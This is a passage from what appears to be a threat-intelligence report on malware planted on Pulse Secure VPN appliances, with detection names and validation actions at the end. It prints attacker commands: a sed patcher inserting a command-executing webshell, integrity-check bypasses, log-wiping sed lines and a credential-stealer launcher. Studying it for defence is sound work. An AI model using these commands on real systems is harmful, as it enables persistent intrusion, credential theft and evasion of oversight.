The passphrase to decrypt is sent in the environment variable\u00a0HTTP_X_CNT. The webshell will set the content type to\u00a0Content-type:text/html\u00a0and the command output printed. Following this, the script exits.\u003c/p\u003e\n\u003ch5\u003eQUIETPULSE\u003c/h5\u003e\n\u003cp\u003eThe file\u00a0dsserver\u00a0(SHA256:\u00a09f6ac39707822d243445e30d27b8404466aa69c61119d5308785bf4a464a9ebd) is a legitimate Perl script with malicious modifications to fork the child process\u00a0/home/bin/dshelper. The dshelper script does not exist on a clean PulseSecure installation, this file is described as QUIETPULSE Utility Script.\u003c/p\u003e\n\u003ch5\u003eQUIETPULSE Utility Script\u003c/h5\u003e\n\u003cp\u003eThe file\u00a0dshelper\u00a0(SHA256:\u00a0c774eca633136de35c9d2cd339a3b5d29f00f761657ea2aa438de4f33e4bbba4) is a shell script invoked by a malicious version of\u00a0dsserver\u00a0that primarily functions as a utility script responsible for copying files and executing commands. Like the ATRIUM patcher, this script accesses /tmp/data, a path which is used during a system upgrade. This file is therefore, like the ATRIUM patcher, used by the attacker to maintain persistence. The script is set to execute in a loop where four main checks are executed every two minutes. The checks are as follows:\u003c/p\u003e\n\u003cp\u003e\u003cem\u003eCheck 1\u003c/em\u003e\u003c/p\u003e\n\u003cp\u003eIf\u00a0/tmp/data/root/home/webserver/htdocs/dana-na/auth/compcheckjava.cgi\u00a0exists and is non-empty then execute:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003egrep -c -s 'system($depara)' /tmp/data/root/home/webserver/htdocs/dana-na/auth/compcheckjava.cgi\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eIt checks if the file has the contents\u00a0system($depara). 
If the file does not contain this content, then retrieve the first line of the file by executing:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003esed -n 1p /tmp/data/root/home/webserver/htdocs/dana-na/auth/compcheckjava.cgi\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThen copy a file via:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003ecp /home/webserver/htdocs/dana-na/auth/compcheckjava.cgi /tmp/data/root/home/webserver/htdocs/dana-na/auth/compcheckjava.cgi\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThen replace the copy\u2019s first line with the one retrieved from the sed above via:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003esed -i 1c\u0026quot;\u0026lt;varies\u0026gt;\u0026quot; /tmp/data/root/home/webserver/htdocs/dana-na/auth/compcheckjava.cgi\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cem\u003eCheck 2\u003c/em\u003e\u003c/p\u003e\n\u003cp\u003eIf\u00a0/tmp/data/root/home/bin/\u00a0exists as a directory, then check if the file\u00a0/tmp/data/root/home/bin/dshelper\u00a0does not exist. 
If it does not exist, then place it there by copying a file via:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003ecp -p /home/bin/dshelper /tmp/data/root/home/bin/\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cem\u003eCheck 3\u003c/em\u003e\u003c/p\u003e\n\u003cp\u003eIf\u00a0/tmp/data/root/home/bin/dsserver\u00a0exists and is non-empty then execute the following to check if the file does not contain the string\u00a0exec(\"/home/bin/dshelper\"):\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003egrep -c -s 'exec(\"/home/bin/dshelper\")' /tmp/data/root/home/bin/dsserver\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eIf it doesn't then execute to insert the line:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003esed -i \u0026#39;s/for (;;)/my $monpid \u003d fork();\\nif ($monpid \u003d\u003d 0) {\\nexec(\\\u0026quot;\\/home\\/bin\\/dshelper\\\u0026quot;);\\n}\\n\u0026amp;/g\u0026#39; /tmp/data/root/home/bin/dsserver\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cem\u003eCheck 4\u003c/em\u003e\u003c/p\u003e\n\u003cp\u003eIf the file\u00a0/tmp/data/root/home/bin/check_integrity.sh\u00a0exists and is non-empty, then check if the file contains the string\u00a0exit 1\u00a0by executing:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003egrep -c -s 'exit 1' /tmp/data/root/home/bin/check_integrity.sh\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eIf the file does contain this content, then execute the following to switch the content to\u00a0exit 0:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003esed -i 's/exit 1/exit 0/g' /tmp/data/root/home/bin/check_integrity.sh\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch5\u003ePULSEJUMP\u003c/h5\u003e\n\u003cp\u003eThe file with SHA256:\u00a07fa71a7f76ef63465cfeacf58217e0b66fc71bc81d37c44380a6f572b8a3ec7a\u00a0is a system information and credential harvesting Perl script. 
The sample writes information from multiple sources to the file\u00a0/tmp/dsactiveuser.statementcounters\u00a0in append mode.\u003c/p\u003e\n\u003cp\u003eThe sample begins by retrieving all auth servers via the API\u00a0AuthAdmin::getAllAuthServers. and logs the results. Next, the sample logs all roles via the API\u00a0DSRole::GeneralAdmin::getRoles\u00a0and writes the values to the file. The sample may also retrieve and log additional information depending on the device configuration.\u003c/p\u003e\n\u003ch5\u003eHARDPULSE\u003c/h5\u003e\n\u003cp\u003eThe file\u00a0compcheckjava.cgi\u00a0(SHA256:\u00a01d3ab04e21cfd40aa8d4300a359a09e3b520d39b1496be1e4bc91ae1f6730ecc) has the ability to read and write arbitrary files and may execute arbitrary commands depending on the implementation of a particular library function.\u003c/p\u003e\n\u003cp\u003eThe sample responds to HTTP GETs and PUTs. The GET path is not relevant, but the PUT path first checks if the incoming requests\u00a0checkcode\u00a0POST param is equal to a hardcoded passcode. If this check passes the sample inspects the param\u00a0hashid\u00a0to determine if it\u0026#39;s non-empty. If non-empty the sample displays a prompt to the user that includes hardware information and then base64 decodes the param\u00a0hashid\u00a0and checks it against pulsesecure. If this matches a recoveryToken is generated which is the MD5 hash of 16 random bytes, with the result hash truncated to 8 characters. This token is then displayed to the user via the URL\u00a0https://ive-host/dana-na/auth/recover[.]cgi?token\u003d\u0026lt;varies\u0026gt;\u00a0and the sample exits. If this check did not match then the sample passes the base64 decoded data to a routine\u00a0DSSafe::psystem\u00a0which may execute shell commands, however this implementation is not provided and is speculation.\u003c/p\u003e\n\u003cp\u003eIf the param hashid is empty the sample instead checks that the param\u00a0m\u00a0is non-empty. 
If so, it's matched against get and put which will read/write arbitrary files to the host, respectively.\u003c/p\u003e\n\u003ch5\u003eATRIUM\u003c/h5\u003e\n\u003cp\u003eThe file\u00a0compcheckresult.cgi\u00a0(SHA256:\u00a0f2b1bd703c3eb05541ff84ec375573cbdc70309ccb82aac04b72db205d718e90) is a webshell capable of arbitrary command execution. The sample has malicious logic inserted at the end of legitimate logic. The malicious logic inspects all requests of any type looking for the HTTP query parameter\u00a0id. If this query parameter exists, the sample executes it verbatim on using the\u00a0system\u00a0API. The sample does not encode or obfuscate the command in any way. If the query parameter is not found in the request, then the original legitimate logic is invoked.\u003c/p\u003e\n\u003ch5\u003ePersistence Patcher\u003c/h5\u003e\n\u003cp\u003eThe file\u00a0DSUpgrade.pm\u00a0(SHA256:\u00a0224b7c45cf6fe4547d3ea66a12c30f3cb4c601b0a80744154697094e73dbd450) is a patcher utility script responsible for persisting webshells across a system upgrade. We\u2019ve observed variants of this utility targeting the persistence of multiple webshell families, notably ATRIUM, STEADYPULSE, and PULSECHECK. Like previous patchers, this sample uses\u00a0sed\u00a0to insert malicious logic. The attacker likely chose\u00a0DSUpgade.pm\u00a0to host their patch logic as it is a core file in the system upgrade procedure, ensuring the patch is during updates. The patcher modifies content in\u00a0/tmp/data\u00a0as this directory holds the extracted upgrade image the newly upgraded system will boot into. 
This results in a persistence mechanism which allows the attacker to maintain access to the system across updates.\u003c/p\u003e\n\u003cp\u003emy $cmd_x\u003d\u0026quot;sed -i \u0026#39;/echo_console \\\u0026quot;Saving package\\\u0026quot;/i(\u00a0 \u00a0 sed -i \\\\\\\u0026#39;/main();\\\\\\$/cif(CGI::param(\\\\\\\\\\\u0026quot;id\\\\\\\\\\\u0026quot;)){\u00a0 \u00a0 \u00a0 \u00a0 print \\\\\\\\\\\u0026quot;Cache-Control: no-cache\\\\\\\\\\\\\\\\n\\\\\\\\\\\u0026quot;;\u00a0 \u00a0 \u00a0 \u00a0 print \\\\\\\\\\\u0026quot;Content-type: text/html\\\\\\\\\\\\\\\\n\\\\\\\\\\\\\\\\n\\\\\\\\\\\u0026quot;;\u00a0 \u00a0 \u00a0 \u00a0 my \\\\\\\\\\$na\u003dCGI::param(\\\\\\\\\\\u0026quot;id\\\\\\\\\\\u0026quot;);\u00a0 \u00a0 \u00a0 \u00a0 system(\\\\\\\\\\\u0026quot;\\\\\\\\\\$na\\\\\\\u0026quot;);\u00a0 \u00a0 } else{\u00a0 \u00a0 \u00a0 \u00a0 \u0026amp;main();\u00a0 \u00a0 }\\\\\\\u0026#39; /tmp/data/root$cgi_p;\u00a0 \u00a0 cp -f /home/perl/DSUpgrade.pm /tmp/data/root/home/perl;\u00a0 \u00a0 cp -f /pkg/dspkginstall /tmp/data/root/pkg/;)\u0026#39;/pkg/do-install\u0026quot;;\u003c/p\u003e\n\u003cp\u003eThe patcher also performs additional shell commands for unpacking a compressed package:\u003c/p\u003e\n\u003cp\u003esystem(\"/bin/mount -o remount,rw /dev/root /\");system(\"/bin/tar\", \"-xzf\", \"/tmp/new-pack.tgz\", \"-C\", \"/tmp\",\"./installer\");system(\"cp -f /tmp/installer/do-install /pkg/\");system(\"cp -f /tmp/installer/VERSION /pkg/\");system(\"cp -f /tmp/installer/sysboot-shlib /pkg/\");system(\"cp -f /tmp/installer/losetup /pkg/\");\u003c/p\u003e\n\u003ch5\u003ePACEMAKER\u003c/h5\u003e\n\u003cp\u003eThe file\u00a0memread\u00a0(SHA256:\u00a068743e17f393d1f85ee937dffacc91e081b5f6f43477111ac96aa9d44826e4d2) is a credential stealer. 
The sample has the usage information:\u003c/p\u003e\n\u003cp\u003eUsage: memread [-t time(minute)] [-m size(MB)] [-s sleep_interval(second)]\u003c/p\u003e\n\u003cp\u003eThe sample starts by setting an alarm that kills the application after a configurable number of minutes, 14 by default. It then enters a loop which reads\u00a0/proc/\u00a0entries every 2 seconds looking for a target application, this interval is also configurable. The target is found by opening\u00a0/proc/\u0026lt;process_name\u0026gt;/cmdline\u00a0for each entry in the folder and then reading this file looking for the string\u00a0dswsd\u00a0within the command line. Once found the target application\u0026#39;s\u00a0proc/\u0026lt;target_pid\u0026gt;/mem\u00a0is opened, the process is attached to with PTRACE, then memory read in chunks up to 512 bytes in size. For each chunk, the string\u00a020 30 20 0A 00 ( 0 \\n)\u00a0is searched for as a needle. If found the sample splits the data by first space, then a dash -. Two dashes are expected to be found, and these are immediately converted into hex numbers, example form: -\u0026lt;number\u0026gt;. If the second number minus the first is \u0026gt; 8191 the sample reads the data starting at the file offset of the first number, up to a size specified by second number minus first number.\u003c/p\u003e\n\u003cp\u003eOnce the sample has read the process memory and found all memory data of interest the sample detaches PTRACE then the sample begins memory scanning the copied data. The sample tries to locate a sequence of 'flags' in memory one by one to locate what seem to be information the attacker wishes to steal. This information is not known, nor is the structure of it. 
The data of interest is generally delimited by start and end sequences; in the order they are scanned for, these are:\u003c/p\u003e\n\u003cp\u003eUSER_START_FLAG: 3C 05 08 75 73 65 72 4E 61 6D 65 05 01 3E 05 00\u003c/p\u003e\n\u003cp\u003eUSER_END_FLAG: 3C 2F 05 08 75 73 65 72 4E 61 6D 65 05 01 3E 00\u003c/p\u003e\n\u003cp\u003ePASSWORD_START_FLAG: 3C 05 08 70 61 73 73 77 6F 72 64 05 01 3E 00\u003c/p\u003e\n\u003cp\u003ePASSWORD_END_FLAG: 3C 2F 05 08 70 61 73 73 77 6F 72 64 05 01 3E 00\u003c/p\u003e\n\u003cp\u003eAUTHNUM_START_FLAG: 3C 05 0A 61 75 74 68 4E 75 6D 62 65 72 05 01 3E 00\u003c/p\u003e\n\u003cp\u003eAUTHNUM_END_FLAG: 3C 2F 05 0A 61 75 74 68 4E 75 6D 62 65 72 05 01 3E 00\u003c/p\u003e\n\u003cp\u003eIf all these sequences are found, the data between each start and end flag is extracted and eventually formatted and written to the file\u00a0/tmp/dsserver-check.statementcounters. The approximate format of this data is:\u003c/p\u003e\n\u003cp\u003eName:\u0026lt;username\u0026gt; || Pwd:\u0026lt;password\u0026gt; || AuthNum:\u0026lt;authnumber\u0026gt;\\n\u003c/p\u003e\n\u003cp\u003eThe sample replaces the following HTML-encoded values with their ASCII representation in the password:\u003c/p\u003e\n\u003cp\u003e\u0026amp;amp; -\u0026gt; \u0026amp;\u003c/p\u003e\n\u003cp\u003e\u0026amp;lt; -\u0026gt; \u0026lt;\u003c/p\u003e\n\u003cp\u003e\u0026amp;gt; -\u0026gt; \u0026gt;\u003c/p\u003e\n\u003ch5\u003ePACEMAKER Launcher Utility\u003c/h5\u003e\n\u003cp\u003eAs part of our investigation into PACEMAKER we were able to retrieve a simple bash script responsible for launching the credential stealer. 
The launcher script (SHA256:\u00a04c5555955b2e6dc55f52b0c1a3326f3d07b325b112060329c503b294208960ec) launches PACEMAKER from a hardcoded path with options specifying a 16MB memory read size and a memory scan interval of 2 seconds, with a variable self-kill time.\u003c/p\u003e\n\u003cp\u003e#!/bin/bash\u003c/p\u003e\n\u003cp\u003e/home/bin/memread -t $1 -m 16 -s 2 \u0026amp;\u003c/p\u003e\n\u003ch5\u003eTHINBLOOD Log Wiper Utility\u003c/h5\u003e\n\u003cp\u003eThe file\u00a0dsclslog\u00a0(SHA256:\u00a088170125598a4fb801102ad56494a773895059ac8550a983fdd2ef429653f079) is a log wiper utility. The sample provides the usage information:\u003c/p\u003e\n\u003cp\u003eUsage: dsclslog -f [events|access] -r [Regex1,Regex2,Regex3,...]\u003c/p\u003e\n\u003cp\u003eThe\u00a0-f\u00a0flag specifies whether the file\u00a0log.events.vc0\u00a0or\u00a0log.access.vc0\u00a0within the directory\u00a0/home/runtime/logs\u00a0should be modified. To perform its log cleaning operations the sample first makes two copies of whichever log file was chosen, but uses\u00a0.vc1\u00a0and\u00a0.vc2\u00a0as the extensions for the new files. The file with the\u00a0.vc1\u00a0extension is used to search for entries that match the given regexes, and the file with the\u00a0.vc2\u00a0extension is used as a temporary file where the cleaned log is written. 
After both files have been generated and log cleaning has finished, the sample executes the following commands via the system API to overwrite the original log with the cleaned version, then removes the intermediate copy:\u003c/p\u003e\n\u003cp\u003emv /home/runtime/logs/log.\u0026lt;logtype\u0026gt;.vc2 /home/runtime/logs/log.\u0026lt;logtype\u0026gt;.vc0\u003c/p\u003e\n\u003cp\u003erm /home/runtime/logs/log.\u0026lt;logtype\u0026gt;.vc1\u003c/p\u003e\n\u003ch5\u003eTHINBLOOD Log Wiper Utility Variant\u003c/h5\u003e\n\u003cp\u003eThe file\u00a0clear_log.sh\u00a0(SHA256:\u00a01741dc0a491fcc8d078220ac9628152668d3370b92a8eae258e34ba28c6473b9) is a BASH script responsible for zeroing log lines that match a given regex pattern. The sample is similar to the compiled\u00a0THINBLOOD\u00a0Log Wiper but edits logs in place with sed rather than making temporary copies. The sed commands used are:\u003c/p\u003e\n\u003cp\u003esed -i \u0026quot;s/.\\x00[^\\x00]*\u0026lt;regex_string\u0026gt;[^\\x00]*\\x09.\\x00//g\u0026quot; /data/runtime/logs/\u0026lt;logfile\u0026gt;\u003c/p\u003e\n\u003cp\u003esed -i \u0026quot;s/\\x\u0026lt;hex_char\u0026gt;\\x00[^\\x00]*$2[^\\x00]*\\x09\\x\u0026lt;hex_char\u0026gt;\\x00//g\u0026quot; /data/runtime/logs/\u0026lt;logfile\u0026gt;\u003c/p\u003e\n\u003cp\u003eThe sample embeds the usage information:\u003c/p\u003e\n\u003cp\u003eusage: /home/bin/bash clear_log.sh [logfile] [keyword(regex)]\u003c/p\u003e\n\u003ch5\u003eLOCKPICK\u003c/h5\u003e\n\u003cp\u003eThe file\u00a0libcrypto.so\u00a0(SHA256:\u00a02610d0372e0e107053bc001d278ef71f08562e5610691f18b978123c499a74d8) is a shared object containing cryptographic logic from OpenSSL. The sample contains a modification to the routine\u00a0bnrand_range\u00a0that breaks the security of the random numbers generated. There are three paths in this routine for generating a random big number within a given range. 
The first case is unmodified and generates a zeroed big number, the other two cases are patched so that a constant value overwrites the generated random value and always returns success. This breaks the random number generation by replacing it with a value the attacker knows in all cases.\u003c/p\u003e\n\u003ch5\u003eLOCKPICK Patcher\u003c/h5\u003e\n\u003cp\u003eThe file with the hash\u00a0b990f79ce80c24625c97810cb8f161eafdcb10f1b8d9d538df4ca9be387c35e4\u00a0is a patcher utility responsible for inserting the malicious logic known as LOCKPICK. The patcher starts by running sed on the integrity checker script built into the appliance to insert an early exit routine. This is inserted by the command\u00a0sed -i '12aexit 0' /home/bin/check_integrity.sh\u00a0which when applied causes this script to exit without performing its intended checks. After this the sample uses python file read/write APIs to insert long strings of assembly that represent the logic known as LOCKPICK. This file is different from the other patchers we\u2019ve identified in that it is python and specifically targets system integrity routines.\u003c/p\u003e\n\u003ch4\u003eDetecting the Techniques\u003c/h4\u003e\n\u003cp\u003eThe following table contains specific FireEye product detection names for the malware families associated with the exploitation of Pulse Secure VPN device.\u003c/p\u003e\n\u003cp\u003e\u00a0\u003c/p\u003e\n\u003cdiv style\u003d\"color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%\"\u003e\n\u003cdiv style\u003d\"color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%\"\u003e\n\u003cdiv style\u003d\"color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%\"\u003e\n\u003cdiv style\u003d\"color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%\"\u003e\n\u003cdiv style\u003d\"color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%\"\u003e\n\u003cdiv style\u003d\"color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%\"\u003e\u003ctable border\u003d\"1\" 
style\u003d\"border-collapse:collapse;width:100%\"\u003e\n\u003ctbody\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:6.72632%\"\u003e\n\u003cp\u003e\u003cstrong\u003ePlatform(s)\u00a0\u003c/strong\u003e\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:93.2945%\"\u003e\n\u003cp\u003e\u003cstrong\u003eDetection Name\u00a0\u003c/strong\u003e\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:6.72632%\"\u003e\n\u003cp\u003eNetwork Security\u00a0\u003c/p\u003e\n\u003cp\u003eEmail Security\u00a0\u003c/p\u003e\n\u003cp\u003eDetection\u00a0On\u00a0Demand\u00a0\u003c/p\u003e\n\u003cp\u003eMalware\u00a0File Scanning\u00a0\u003c/p\u003e\n\u003cp\u003eMalware\u00a0File\u00a0Storage Scanning\u00a0\u003c/p\u003e\n\u003cp\u003e\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:93.2945%\"\u003e\n\u003cp\u003eFE_APT_Webshell_PL_HARDPULSE_1\u003cbr\u003eFEC_APT_Webshell_PL_HARDPULSE_1\u003cbr\u003eAPT.Webshell.PL.HARDPULSE\u003c/p\u003e\n\u003cp\u003eFE_APT_Trojan_PL_PULSEJUMP_1\u003cbr\u003eFEC_APT_Trojan_PL_PULSEJUMP_1\u003cbr\u003eFE_Trojan_PL_Generic_1\u003c/p\u003e\n\u003cp\u003eFE_APT_Trojan_PL_RADIALPULSE_1\u003cbr\u003eFEC_APT_Trojan_PL_RADIALPULSE_1\u003cbr\u003eFE_APT_Trojan_PL_RADIALPULSE_2\u003cbr\u003eFE_APT_Trojan_PL_RADIALPULSE_3\u003cbr\u003eFEC_APT_Trojan_PL_RADIALPULSE_2\u003cbr\u003eFE_APT_Trojan_PL_RADIALPULSE_4\u003cbr\u003eFEC_APT_Trojan_PL_RADIALPULSE_3\u003cbr\u003eFE_APT_Trojan_PL_RADIALPULSE_5\u003cbr\u003eFE_APT_Tool_SH_RADIALPULSE_1\u003cbr\u003eFEC_APT_Tool_SH_RADIALPULSE_1\u003c/p\u003e\n\u003cp\u003eFE_APT_Trojan_Linux32_PACEMAKER_1\u003cbr\u003eFE_APT_Trojan_Linux_PACEMAKER_1\u003c/p\u003e\n\u003cp\u003eFE_APT_Backdoor_Linux32_SLOWPULSE_1\u003cbr\u003eFE_APT_Backdoor_Linux32_SLOWPULSE_2\u003cbr\u003eFE_APT_Trojan_Linux32_SLOWPULSE_1\u003cbr\u003eFE_APT_Tool_Linux32_SLOWPULSE_1\u003c/p\u003e\n\u003cp\u003eFE_APT_Webshell_PL_STEADYPULSE_1\u003cbr\u003eFEC_APT_Webshell_PL_STEADYPULSE_1\u003cbr\u003eAPT.Webshell.PL.STEADYPULSE\u003c/p\u003e\n\u003cp\u003eFE_APT_Trojan_Linux32_LOCKPICK_1\u003c/p\u003e\n\u003cp\u003eFE_Webshell_PL_ATRIUM_1\u003cbr\u003eFEC_Webshell_PL_ATRIUM_1\u003cbr\u003eFE_Trojan_SH_ATRIUM_1\u003c/p\u003e\n\u003cp\u003eFE_APT_Webshell_PL_SLIGHTPULSE_1\u003cbr\u003eFEC_APT_Webshell_PL_SLIGHTPULSE_1\u003cbr\u003eAPT.Webshell.PL.SLIGHTPULSE\u003c/p\u003e\n\u003cp\u003eFE_APT_Webshell_PL_PULSECHECK_1\u003cbr\u003eFEC_APT_Webshell_PL_PULSECHECK_1\u003c/p\u003e\n\u003cp\u003eFE_APT_Tool_Linux32_THINBLOOD_1\u003cbr\u003eFE_APT_Tool_Linux_THINBLOOD_1\u003cbr\u003eFE_APT_Tool_SH_THINBLOOD_1\u003cbr\u003eFEC_APT_Tool_SH_THINBLOOD_1\u003cbr\u003eAPT.Tool.Linux.THINBLOOD.MVX\u003c/p\u003e\n\u003cp\u003eFE_APT_Trojan_PL_QUIETPULSE_1\u003cbr\u003eFEC_APT_Trojan_PL_QUIETPULSE_1\u003cbr\u003eFE_Trojan_SH_Generic_2\u003cbr\u003eFEC_Trojan_SH_Generic_3\u003c/p\u003e\n\u003cp\u003eSuspicious Pulse Secure HTTP request (IPS)\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:6.72632%\"\u003e\n\u003cp\u003eEndpoint Security\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:93.2945%\"\u003e\n\u003cp\u003eReal-Time (IOC)\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eSLOWPULSE (BACKDOOR)\u003c/li\u003e\n\u003cli\u003ePACEMAKER (LAUNCHER)\u003c/li\u003e\n\u003cli\u003eTHINBLOOD (UTILITY)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:6.72632%\"\u003e\n\u003cp\u003eHelix\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:93.2945%\"\u003e\n\u003cp\u003eVPN ANALYTICS [Abnormal Logon]\u003cbr\u003eEXPLOIT - SONICWALL ES [CVE-2021-20021 Attempt]\u003cbr\u003eEXPLOIT - SONICWALL ES [CVE-2021-20021 Success]\u003cbr\u003eEXPLOIT - SONICWALL ES [CVE-2021-20023 Attempt]\u003cbr\u003eEXPLOIT - SONICWALL ES [CVE-2021-20023 Success]\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003c/tbody\u003e\n\u003c/table\u003e\u003c/div\u003e\n\u003c/div\u003e\n\u003c/div\u003e\n\u003c/div\u003e\n\u003c/div\u003e\n\u003c/div\u003e\n\u003ch4\u003eMandiant Security Validation Actions\u003c/h4\u003e\n\u003cp\u003eOrganizations can validate their security controls using the following actions with\u00a0\u003ca href\u003d\"https://www.mandiant.com/advantage/security-validation\" rel\u003d\"noopener\" target\u003d\"_blank\" 
title\u003d\"https://www.fireeye.com/mandiant/security-validation.html\"\u003eMandiant Security Validation\u003c/a\u003e.\u003c/p\u003e\n\u003cp\u003e\u00a0\u003c/p\u003e\n\u003cdiv style\u003d\"color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%\"\u003e\n\u003cdiv style\u003d\"color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%\"\u003e\n\u003cdiv style\u003d\"color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%\"\u003e\n\u003cdiv style\u003d\"color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%\"\u003e\n\u003cdiv style\u003d\"color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%\"\u003e\n\u003cdiv style\u003d\"color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%\"\u003e\u003ctable border\u003d\"1\" style\u003d\"border-collapse:collapse;width:100%\"\u003e\n\u003ctbody\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:47.0588%\"\u003e\n\u003cp\u003e\u003cstrong\u003eVID\u003c/strong\u003e\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:52.9412%\"\u003e\n\u003cp\u003e\u003cstrong\u003eTitle\u003c/strong\u003e\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:47.0588%\"\u003e\n\u003cp\u003eA101-596\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:52.9412%\"\u003e\n\u003cp\u003eMalicious File Transfer - SLOWPULSE, Download, Variant #1\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:47.0588%\"\u003e\n\u003cp\u003eA101-597\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:52.9412%\"\u003e\n\u003cp\u003eMalicious File Transfer - SLOWPULSE, Download, Variant #2\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:47.0588%\"\u003e\n\u003cp\u003eA101-598\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:52.9412%\"\u003e\n\u003cp\u003eMalicious File Transfer - SLOWPULSE, Download, Variant 
#3\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:47.0588%\"\u003e\n\u003cp\u003eA101-599\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:52.9412%\"\u003e\n\u003cp\u003eMalicious File Transfer - SLOWPULSE, Download, Variant #4\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:47.0588%\"\u003e\n\u003cp\u003eA101-600\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:52.9412%\"\u003e\n\u003cp\u003eMalicious File Transfer - SLOWPULSE, Download, Variant #5\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:47.0588%\"\u003e\n\u003cp\u003eA101-601\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:52.9412%\"\u003e\n\u003cp\u003eMalicious File Transfer - SLOWPULSE, Download, Variant #6\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:47.0588%\"\u003e\n\u003cp\u003eA101-602\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:52.9412%\"\u003e\n\u003cp\u003eMalicious File Transfer - SLOWPULSE, Download, Variant #7\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:47.0588%\"\u003e\n\u003cp\u003eA101-604\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:52.9412%\"\u003e\n\u003cp\u003eMalicious File Transfer - Pulse Secure Vulnerability, Utility, Download, Variant #1\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:47.0588%\"\u003e\n\u003cp\u003eA101-605\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:52.9412%\"\u003e\n\u003cp\u003eMalicious File Transfer - RADIALPULSE, Download, Variant #1\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:47.0588%\"\u003e\n\u003cp\u003eA101-606\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd 
